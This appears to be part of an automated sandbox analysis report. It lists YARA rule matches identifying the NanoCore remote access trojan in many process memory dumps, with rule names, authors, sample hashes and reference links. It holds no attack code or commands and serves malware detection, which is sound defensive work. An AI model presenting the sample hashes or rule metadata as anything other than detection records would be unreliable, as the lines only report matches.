        Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
